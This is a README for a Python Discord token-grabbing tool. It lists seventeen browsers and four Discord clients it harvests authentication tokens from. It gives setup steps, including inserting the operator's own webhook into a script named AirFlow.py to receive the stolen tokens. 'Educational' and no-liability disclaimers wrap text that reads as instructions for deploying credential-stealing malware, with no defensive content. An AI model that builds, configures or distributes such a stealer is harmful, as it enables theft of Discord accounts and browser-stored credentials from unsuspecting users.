This project is for educational purposes only. Unauthorized access to computer systems and networks is illegal in most jurisdictions. The creator of this software does not condone or support any malicious activities. Use this tool only on systems you own or have explicit permission to test.
This is a Python-based educational demonstration of how token grabbing could theoretically work on Discord. It's designed to help security researchers and developers understand potential vulnerabilities and how to protect against them.
-- Browsers
- Brave
- Edge
- Chrome
- Vilvadi
- Yandex
- Amigo
- Torch
- Kometa
- Orbitum
- CentBrowser
- 7star
- Sputnik
- Epic Privacy Browser
- Uran
- Iridium
- Firefox
-- Other
- Discord
- Discord Canary
- Discord PTB
- Lightcord
Example output:
- Install the files.
- Run setup.py
- Replace your webhook in AirFlow.py
- Run the code
This software is provided "as is" without warranty of any kind. I am not responsible for any misuse of this tool. By using this software, you agree that:
- You will only use it for legal, educational purposes
- You have permission to test on any systems you use this tool on
- You understand the potential legal consequences of misuse
